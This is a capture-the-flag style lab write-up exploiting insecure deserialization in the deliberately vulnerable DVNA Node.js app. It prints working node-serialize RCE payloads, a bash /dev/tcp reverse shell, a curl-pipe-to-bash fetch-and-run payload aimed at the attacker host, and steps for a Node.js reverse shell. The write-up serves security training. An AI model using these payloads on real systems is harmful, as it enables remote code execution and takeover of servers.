# Node.js - Insecure Deserialization : DVNA

### Lab :

* <https://github.com/appsecco/dvna>
* Vulnerability name : `A8 - Insecure Deserialization`

### Deployment :

Deployed with the docker option described in the DVNA repository.

### Networking :

Vulnerable App IP: `172.17.0.2`

Kali machine IP : `172.17.0.1` (the host side of the default `docker0` bridge)

* Note:
  * I was using a docker container; to look up a container's IP, run

    ```bash
    docker inspect --format '{{ .NetworkSettings.IPAddress }}' container_name_or_id
    ```

### Understanding Application Behaviour :

The vulnerable function is located at this URL:

```
http://127.0.0.1:9090/app/bulkproducts?legacy=true
```

Requesting it returns the product list as JSON in the following format:

```json
[{"name":"Xbox 360","code":"15","tags":"gaming console","description":"Microsoft's flagship gaming console"},{"name":"Playstation 3","code":"17","tags":"gaming console","description":"Sony's flagshipgaming console"}]
```

Copy this JSON to a file and upload the file back through the bulk products form to see how the app handles the request.

![](/files/LJL7oQnyaHDXRLNRij19)

The app redirects us to the product page, and if we follow the redirection we can see that it prints the JSON data we uploaded in the product table.

![](/files/wprhlnWPfsCJ20IDsXTE)

### Triggering the Vulnerability :

The `_$$ND_FUNC$$_` prefix is the marker `node-serialize` uses for serialized functions: when `unserialize()` meets a string value starting with it, the rest of the string is handed to `eval()`, and the trailing `()` turns the function literal into an IIFE that runs during deserialization itself. I first injected the following payload, which just executes `ls`, to see whether the application would print the command output in the table:

```json
{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ls', function(error, stdout, stderr) { console.log(stdout) });}()"}
```

![](/files/mhSXDYgWEQGtYvc4SxNP)

but got an error message:

![](/files/vV42OYwrkGym8pYtR4TG)

The error does not mean the command failed. `console.log(stdout)` writes to the server process's console, not to the HTTP response, so the table would never show the output even on success; the deserialized object also lacks the product fields the page expects. Treat it as a blind injection and confirm execution out of band instead, for example by making the app `ping` our host and watching for the ICMP echo requests (`ping` without a count keeps running on the target until killed, so `ping -c 3` would be tidier):

```json
{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ping 172.17.0.1', function(error, stdout, stderr) { console.log(stdout) });}()"}
```

and capturing `icmp` packets on our host with tcpdump (the interface is `docker0` when the target is a container on the default bridge):

```bash
tcpdump -nni ethernet_interface icmp
```

After uploading the ping payload the echo requests arrive, so the app executed our command!

![](/files/FfwfcuDqWySdNhh773Rd)

### Reverse Shell - BASH TCP :

Host the following `shell.sh` with python's `SimpleHTTPServer`. The payloads below fetch `http://172.17.0.1/shell.sh` without a port, so the server must listen on port 80 (`sudo python -m SimpleHTTPServer 80`), and a listener has to be waiting on port 4242 (`nc -lvnp 4242`) before the script runs:

```bash
bash -i >& /dev/tcp/172.17.0.1/4242 0>&1
```

First pass a payload that only `curl`s `shell.sh`, to check that the application can fetch the file from our host:

```json
{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('curl http://172.17.0.1/shell.sh', function(error, stdout, stderr) { console.log(stdout) });}()"}
```

and we can see that the app fetched our file

![](/files/RcRxdMT7aD3qDs7Q85lT)

Now pass the payload that both **fetches the file** (`curl`) and **executes it** (by piping it to `bash`):

```json
{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('curl http://172.17.0.1/shell.sh | bash', function(error, stdout, stderr) { console.log(stdout) });}()"}
```

and we get a shell back on our listener!

![](/files/9WgnGuSh5RlXSoiHShua)

### Reverse Shell - Node.js :

For a more stable shell we can use a JavaScript reverse shell instead of bash. I used the `nodejsshell.py` script (<https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py>), which generates the `JS` payload for us.

#### Running the script

```bash
python nodejsshell.py 172.17.0.1 4242
```

![](/files/936iCgQ8Lwocq856rhex)

Now place the generated reverse shell `JS` payload inside the `function body` of the serialized payload, as described in this article: <https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/>

The final payload looks like this:

```
{"rce":"_$$ND_FUNC$$_function (){ .. place the JS payload here .. }()"}
```

and we got the shell !

![](/files/MgZKjKqXZ9tXwFS4Q0sC)

